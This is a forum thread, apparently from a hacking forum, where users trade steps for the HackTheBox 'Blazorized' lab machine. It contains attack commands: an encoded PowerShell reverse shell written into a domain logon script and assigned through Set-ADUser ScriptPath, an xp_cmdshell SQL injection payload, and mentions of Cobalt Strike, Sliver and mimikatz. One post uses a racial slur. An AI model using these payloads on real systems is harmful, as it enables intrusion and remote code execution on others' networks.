HTB - Blazorized
by bmoon10 - Saturday June 29, 2024 at 07:00 PM
(Jul 01, 2024, 08:23 AM)mmkz Wrote:
echo "powershell -e JAB..." | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\login.bat -Encoding ASCII
Set-ADUser -Identity SSA_6010 -ScriptPath '\\dc1\NETLOGON\A32FF3AEAA23\login.bat'
I cannot get shell, could you please help?

Drop the part before netlogon and only keep the relative path.
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
Reply
(Jul 01, 2024, 04:23 AM)mycatdante Wrote: Ppl still asking JWT don't even really look into the source code and previous threads to figure out why but just copy-paste

and this's exactly why you shall not produce any writeups for this niggas. they will just copy-pasta.
at some point they will give up and come back to minecraft or their pokemon game.
Reply
(Jul 01, 2024, 08:49 AM)ritualist Wrote:
(Jul 01, 2024, 08:23 AM)mmkz Wrote:
echo "powershell -e JAB..." | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\login.bat -Encoding ASCII
Set-ADUser -Identity SSA_6010 -ScriptPath '\\dc1\NETLOGON\A32FF3AEAA23\login.bat'
I cannot get shell, could you please help?

Drop the part before netlogon and only keep the relative path.
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'

And use revshells.com to generate a powershell command line to load a reverse shell and put that command line in a .bat file
Reply
why PowerView.ps1 not work for me
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
Server instance not found on the given port.
At line:1 char:1
+ Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (SSA_6010:ADUser) [Set-ADUser], ArgumentException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.ArgumentException,Microsoft.ActiveDirectory.Management.Commands.SetADUser
Reply
(Jul 01, 2024, 09:05 AM)S3mj Wrote: why PowerView.ps1 not work for me
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
Server instance not found on the given port.
At line:1 char:1
+ Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\login.bat'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (SSA_6010:ADUser) [Set-ADUser], ArgumentException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.ArgumentException,Microsoft.ActiveDirectory.Management.Commands.SetADUser

get a Cobalt Strike beacon on the box and then:
beacon> powershell-import  ../path/to/your/tools/PowerView.ps1

same should work with Sliver https://github.com/BishopFox/sliver
Reply
ldap ports are not open box reset but not open it. Any solution

PS C:\temp> PS C:\temp> ./mimikatz.exe start but not show any things
Reply
PS C:\temp> PS C:\temp> ./mimikatz.exe start but not show any things
Reply
Hi I know many of you have posted answers but I'm still not able to get SQL injection. Can anyone help on where to inject payload in "Check Duplicate post titles"
Reply
(Jul 01, 2024, 11:12 AM)Pie17 Wrote: Hi I know many of you have posted answers but I'm still not able to get SQL injection. Can anyone help on where to inject payload in "Check Duplicate post titles"

1'; EXEC master.dbo.xp_cmdshell 'powershell -e <Base64> ...';--
Reply
(Jul 01, 2024, 11:19 AM)imassxck Wrote:
(Jul 01, 2024, 11:12 AM)Pie17 Wrote: Hi I know many of you have posted answers but I'm still not able to get SQL injection. Can anyone help on where to inject payload in "Check Duplicate post titles"

1'; EXEC master.dbo.xp_cmdshell 'powershell -e <Base64> ...';--

Worked Thanks
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,929 6 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,530 6 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,796 7 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,610 10 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)